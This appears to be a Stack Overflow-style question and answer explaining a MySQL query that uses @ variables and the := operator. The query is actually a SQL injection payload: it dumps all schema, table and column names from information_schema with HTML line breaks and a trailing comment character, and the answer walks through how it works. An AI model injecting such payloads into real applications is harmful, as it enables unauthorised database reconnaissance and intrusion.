# I don't get how this SQL Query work and the := operator

Tags: mysql, sql

I found this sql query online , i did work but am not quite able to parse it . 
i haven't used any queries with '@' or " := " 
if some one could explain me what it means and which topic it comes under , it would help me a lot ..

```
 select (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)#
```

Comment: See this question: http://stackoverflow.com/questions/1009954/mysql-variable-vs-variable-whats-the-difference.

Comment: [:= is the assignment operator](http://dev.mysql.com/doc/refman/5.0/en/assignment-operators.html#operator_assign-value).

Comment: Patrick what about just @ without the variable name ?

Comment: can any one explain how @ get assigned ( the order ) and then what the query means ?

Comment: I'd be interested in *where* you found that query online ...

Comment: Perhaps it was some sort of site like this http://www.securityidiots.com/Web-Pentest/SQL-Injection/sql-evil-twin-injection.html

Answer (score 2):

First of all i would make the query a litte bit more readable by reformatting it:

```
1) SELECT (SELECT (@)
2)         FROM (SELECT (@:=0x00),
3)                      (SELECT (@)
4)                       FROM (information_schema.columns)
5)                       WHERE (table_schema >= @)
6)                       AND   (@) IN (@:=CONCAT(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))
7)                       )
8)               )
9)        a);
```

The assignment of @ is as follows:

1. In Line 3 it gets the value 0x00 (Decimal: 0)
2. In line 5 this value is used for the greater than (table_schema >= 0)
3. Line 6 is a way to concat each schema, table and column name into @
4. @ is returned in line 1 and contains a concatenated list of your structures

In line 6 an additional `<br>` (0x3C,0x62,0x72,0x3E) is added to the variable to make the output more readable